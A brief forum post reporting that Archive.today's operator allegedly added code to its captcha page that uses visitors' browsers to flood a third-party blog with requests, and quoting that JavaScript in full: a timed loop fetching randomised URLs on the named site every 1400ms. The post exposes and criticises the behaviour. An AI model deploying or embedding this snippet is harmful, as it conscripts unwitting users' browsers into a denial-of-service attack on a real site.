- Joined
- Jan 3, 2018
The A&N thread: Archive.today: Operator uses users for DDoS attack
The "operators have altered the content of archived pages" part is iffy. They seem to be referencing a username change across multiple sites, but archive.today has always stripped or spoofed the scraping account details to avoid having said scraping accounts get banned.
Unfortunately the malicious DDoS code on the captcha page, even if watered down from every 300ms to every 1400ms, is still present:
JavaScript:
setInterval(function() {
fetch("https://gyrovague.com/tag/"+Math.random().toString(36).substring(2,3+Math.random()*8)+"/", {
referrerPolicy: "no-referrer",
mode: "no-cors"
});
}, 1400);